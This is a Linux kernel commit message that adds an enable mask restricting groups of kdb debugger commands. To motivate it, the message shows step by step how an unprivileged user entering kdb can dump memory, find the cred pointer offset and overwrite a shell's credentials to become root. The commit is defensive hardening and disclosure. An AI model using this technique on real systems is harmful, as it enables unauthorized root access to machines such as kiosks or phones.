• Anton Vorontsov's avatar
    kdb: Add enable mask for groups of commands · 420c2b1b
    Anton Vorontsov authored
    Currently all kdb commands are enabled whenever kdb is deployed. This
    makes it difficult to deploy kdb to help debug certain types of
    systems.
    
    Android phones provide one example; the FIQ debugger found on some
    Android devices has a deliberately weak set of commands to allow the
    debugger to enabled very late in the production cycle.
    
    Certain kiosk environments offer another interesting case where an
    engineer might wish to probe the system state using passive inspection
    commands without providing sufficient power for a passer by to root it.
    
    Without any restrictions, obtaining the root rights via KDB is a matter of
    a few commands, and works everywhere. For example, log in as a normal
    user:
    
    cbou:~$ id
    uid=1001(cbou) gid=1001(cbou) groups=1001(cbou)
    
    Now enter KDB (for example via sysrq):
    
    Entering kdb (current=0xffff8800065bc740, pid 920) due to Keyboard Entry
    kdb> ps
    23 sleeping system daemon (state M) processes suppressed,
    use 'ps A' to see all.
    Task Addr               Pid   Parent [*] cpu State Thread             Command
    0xffff8800065bc740      920      919  1    0   R  0xffff8800065bca20 *bash
    
    0xffff880007078000        1        0  0    0   S  0xffff8800070782e0  init
    [...snip...]
    0xffff8800065be3c0      918        1  0    0   S  0xffff8800065be6a0  getty
    0xffff8800065b9c80      919        1  0    0   S  0xffff8800065b9f60  login
    0xffff8800065bc740      920      919  1    0   R  0xffff8800065bca20 *bash
    
    All we need is the offset of cred pointers. We can look up the offset in
    the distro's kernel source, but it is unnecessary. We can just start
    dumping init's task_struct, until we see the process name:
    
    kdb> md 0xffff880007078000
    0xffff880007078000 0000000000000001 ffff88000703c000   ................
    0xffff880007078010 0040210000000002 0000000000000000   .....!@.........
    [...snip...]
    0xffff8800070782b0 ffff8800073e0580 ffff8800073e0580   ..>.......>.....
    0xffff8800070782c0 0000000074696e69 0000000000000000   init............
    
    ^ Here, 'init'. Creds are just above it, so the offset is 0x02b0.
    
    Now we set up init's creds for our non-privileged shell:
    
    kdb> mm 0xffff8800065bc740+0x02b0 0xffff8800073e0580
    0xffff8800065bc9f0 = 0xffff8800073e0580
    kdb> mm 0xffff8800065bc740+0x02b8 0xffff8800073e0580
    0xffff8800065bc9f8 = 0xffff8800073e0580
    
    And thus gaining the root:
    
    kdb> go
    cbou:~$ id
    uid=0(root) gid=0(root) groups=0(root)
    cbou:~$ bash
    root:~#
    
    p.s. No distro enables kdb by default (although, with a nice KDB-over-KMS
    feature availability, I would expect at least some would enable it), so
    it's not actually some kind of a major issue.
    Signed-off-by: default avatarAnton Vorontsov <anton.vorontsov@linaro.org>
    Signed-off-by: default avatarJohn Stultz <john.stultz@linaro.org>
    Signed-off-by: default avatarDaniel Thompson <daniel.thompson@linaro.org>
    Cc: Jason Wessel <jason.wessel@windriver.com>
    Signed-off-by: default avatarJason Wessel <jason.wessel@windriver.com>
    420c2b1b
kdb_main.c 70.1 KB